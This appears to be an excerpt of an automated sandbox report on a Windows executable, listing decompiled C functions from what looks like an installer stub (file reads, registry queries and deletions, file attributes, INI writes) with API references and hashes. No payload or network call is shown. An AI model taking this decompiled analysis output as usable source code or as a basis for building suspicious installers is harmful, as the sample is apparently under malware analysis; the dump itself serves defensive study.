0x10002820
0x10002821
0x10002822
0x10002824
0x10002829
0x1000282b
0x1000282b
0x1000282e
0x10002834
0x00000000

APIs

ReadFile.KERNELBASE(00000000), ref: 1000285B
GetLastError.KERNEL32 ref: 10002962

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402517 Relevance: 3.1, APIs: 2, Instructions: 79
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402517(intOrPtr __ebx, void* __edi, void* __esi) {
				intOrPtr _t28;
				void* _t37;
				void* _t40;

				 *((intOrPtr*)(_t37 - 0x30)) = __ebx;
				_t28 = E004029EA(2);
				_t40 = _t28 - 1;
				 *((intOrPtr*)(_t37 - 0x34)) = _t28;
				if(_t40 < 0) {
					L25:
					 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0x34)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L22:
						__esi =  *((intOrPtr*)(__ebp - 0x30));
						goto L23;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 8) = E00405B0F(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0x34)) <= __ebx) {
							goto L22;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 0x30));
							while(1) {
								__ebp - 0x2c = __ebp - 9;
								__eax = ReadFile( *(__ebp - 8), __ebp - 9, 1, __ebp - 0x2c, __ebx); // executed
								if(__eax == 0 ||  *(__ebp - 0x2c) != 1) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x18)) != __ebx) {
									 *(__ebp - 9) & 0x000000ff = E00405AF6(__edi,  *(__ebp - 9) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 9);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 8), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 9);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0x34))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L26;
							}
							L23:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t40 == 0) {
								 *(_t37 - 4) = 1;
							}
							goto L25;
						}
					}
				}
				L26:
				return 0;
			}

0x00402519
0x0040251c
0x00402521
0x00402524
0x00402527
0x0040289c
0x0040289f
0x0040252d
0x0040252d
0x00402534
0x00402536
0x00402536
0x0040253b
0x004025cf
0x004025cf
0x00000000
0x00402541
0x00402542
0x0040254d
0x00402550
0x00000000
0x00402552
0x00402552
0x00402555
0x0040255a
0x00402563
0x0040256b
0x00000000
0x00000000
0x00402576
0x0040259f
0x00402578
0x0040257c
0x004025a9
0x004025af
0x004025c7
0x004025b9
0x004025b9
0x004025bc
0x004025bc
0x00000000
0x00402584
0x00402584
0x00402587
0x0040258a
0x0040258d
0x00402590
0x00000000
0x00402592
0x00402595
0x00000000
0x00402597
0x00000000
0x00402597
0x00402595
0x00402590
0x0040257c
0x00000000
0x00402576
0x004025d2
0x004025d2
0x004015a8
0x0040266d
0x0040266d
0x00000000
0x004015a8
0x00402550
0x0040253b
0x004028a5
0x004028ab

APIs

ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563

Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileReadwsprintf
String ID:
API String ID: 3326442220-0
Opcode ID: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
Instruction ID: 06e7f106e31df8bdef2bd810d63df5d3c97d0fbe38466024ce319a2e702c6f31
Opcode Fuzzy Hash: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
Instruction Fuzzy Hash: D521E1B1D05299FFDF219B948E686AEBB759B01304F14407BF481B62D2D6B88A81C72D

Uniqueness

Uniqueness Score: -1.00%

Function 004023C6 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004023C6(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B11(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402A07(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x2c) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x2c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x14) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x14) == __ebx;
							E00405AF6(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x14);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				return 0;
			}

0x004023c6
0x004023c6
0x004023cb
0x004023d2
0x004023d4
0x004023db
0x004023dd
0x0040266d
0x004023e3
0x004023e6
0x00402401
0x00402431
0x00402431
0x00402433
0x00402403
0x00402407
0x00402420
0x00402427
0x0040242a
0x00402409
0x0040240c
0x00402417
0x00402487
0x00000000
0x00000000
0x00000000
0x0040240c
0x00402407
0x0040248d
0x0040248e
0x0040248e
0x0040289f
0x004028ab

APIs

Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003F6,00000000,00000022,00000000,?,?), ref: 00402B39

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7F31.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
Instruction ID: 229bf70010f867cab42174c5808720b5045325e5d967dec612ec992921af3bc6
Opcode Fuzzy Hash: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
Instruction Fuzzy Hash: D911A331D05205EFDB15CFA4CA885AFBBB4AF04344F20843FE446B72C0D6B85A41DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 004022BE Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022BE(void* __ebx) {
				char* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x14) - __ebx;
				if( *(_t23 - 0x14) != __ebx) {
					_t6 = E00402A07(0x22);
					_t18 =  *(_t23 - 0x14) & 0x00000002;
					__eflags =  *(_t23 - 0x14) & 0x00000002;
					_t8 = E00402A47(E00402AFC( *((intOrPtr*)(_t23 - 0x20))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402B11(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueA(_t22, E00402A07(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x004022be
0x004022be
0x004022c1
0x004022f0
0x004022f8
0x004022f8
0x00402306
0x0040230b
0x00000000
0x004022c3
0x004022ca
0x004022ce
0x0040266d
0x0040266d
0x004022d4
0x004022e4
0x004022e6
0x0040230d
0x0040230f
0x00000000
0x00402315
0x0040230f
0x004022ce
0x0040289f
0x004028ab

APIs

Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003F6,00000000,00000022,00000000,?,?), ref: 00402B39

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DD
RegCloseKey.ADVAPI32(00000000), ref: 004022E6

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
Instruction ID: 0038f50324932004c091ce3bbea58ac29e0da352c26995222e1fcab20123e112
Opcode Fuzzy Hash: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
Instruction Fuzzy Hash: ABF0AF32A00110ABDB10BBF58E8EEAE62689B40318F10053BF501B71C1D9FD5D01966E

Uniqueness

Uniqueness Score: -1.00%

Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004019F1(char __ebx) {
				CHAR* _t7;
				long _t8;
				char _t12;
				CHAR* _t17;
				void* _t19;

				_t12 = __ebx;
				_t7 = E00402A07(1);
				 *(_t19 + 8) = _t7;
				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x400); // executed
				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x1c)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
					 *((intOrPtr*)(_t19 - 4)) = 1;
					 *_t17 = _t12;
				}
				_t17[0x3ff] = _t12;
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004019f1
0x004019f5
0x00401a01
0x00401a04
0x00401a0c
0x00401a21
0x00401a24
0x00401a24
0x00401a26
0x0040289f
0x004028ab

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
Instruction ID: afb86ebb905af139dc7494b608cce5e0607b26c706a03dcc942419ad1d9f91eb
Opcode Fuzzy Hash: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
Instruction Fuzzy Hash: 95F02032F06240EBCB21CFAADD48AABBFE8DF51350B10403BE508F2290D6388501CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
EnableWindow.USER32(00000000,00000000), ref: 00401DCD

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
Instruction ID: 1f6c93b120dc61c6d4456c8bda968d24c35af38667243ca5670bd8e00a7a4229
Opcode Fuzzy Hash: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
Instruction Fuzzy Hash: 14E0C273B04110DBDB20BBF5AE4AA6E3364EF00369B100837F102F10D1D6B99C40866E

Uniqueness

Uniqueness Score: -1.00%

Function 00405846 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405846(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040584a
0x00405857
0x0040586c
0x00405872

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405821 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405821(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405826
0x0040582c
0x00405831
0x0040583a
0x0040583a
0x00405843

APIs

GetFileAttributesA.KERNELBASE(?,?,00405439,?,?,00000000,0040561C,?,?,?,?), ref: 00405826
SetFileAttributesA.KERNEL32(?,00000000), ref: 0040583A

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
Instruction ID: 17f37b219c6dc411dd2b2fa4057394c3483c25ebcdd970f38988b6a36dadc869
Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
Instruction Fuzzy Hash: F5D01272908120BFC2113728EE0C89BBF95DB54371B018F31FD69A22F0C7304C62CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00402239 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402239(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402A07(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402A07(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
					_t11 = E00402A07(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402A07(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}

0x00402239
0x00402239
0x0040223b
0x0040223f
0x00402242
0x0040224a
0x0040224e
0x00402257
0x00402257
0x0040225c
0x00402265
0x00402265
0x00402272
0x004015a6
0x004015a8
0x0040266d
0x0040266d
0x0040289f
0x004028ab

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
Opcode Fuzzy Hash: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004025DD Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E004025DD(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E004029EA(2);
					_t8 = SetFilePointer(E00405B0F(_t12, _t15), _t6, _t10,  *(_t17 - 0x18)); // executed
					if( *((intOrPtr*)(_t17 - 0x20)) >= _t10) {
						_push(_t8);
						E00405AF6();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004025dd
0x004025de
0x004025ea
0x004025f7
0x00402600
0x00402842
0x00402844
0x00402844
0x00402600
0x0040289f
0x004028ab

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025F7

Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
Instruction ID: 9b79bc57a545877cc82f6085c62fac977e34f5f1dcfdecb1c33821ac61e83e99
Opcode Fuzzy Hash: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
Instruction Fuzzy Hash: E4E04F77A04110ABD701F7E56E4ADBF7668EB04319B14853BF501F10D2C6BD58019A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402B11 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402B11(void* __eflags, void* _a4) {
				signed int _t6;
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t6 =  *0x42ec50; // 0x100
				_t8 = E00402A07(0x22);
				_t9 =  *0x40afc0; // 0x19e5cc
				_t3 = _t9 + 4; // 0x3f6
				_t11 = RegOpenKeyExA(E00402AFC( *_t3), _t8, 0, _t6 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402b18
0x00402b25
0x00402b2b
0x00402b30
0x00402b39
0x00402b41
0x00402b49

APIs

RegOpenKeyExA.KERNELBASE(00000000,000003F6,00000000,00000022,00000000,?,?), ref: 00402B39

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
Instruction ID: 0b28659bbc1d1e591b010bb8b89045cb2232f94fbe33c9534bf79020f9b3c98c
Opcode Fuzzy Hash: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
Instruction Fuzzy Hash: EBE0E676250109BFD710EFE6DD47FA57BDCB704754F004425B608E7091CA74E5509B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040308E Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040308E(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409018, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403092
0x004030a5
0x004030ad
0x00000000
0x004030b4
0x00000000
0x004030b6

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBB,000000FF,00000004,00000000,00000000,00000000), ref: 004030A5

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
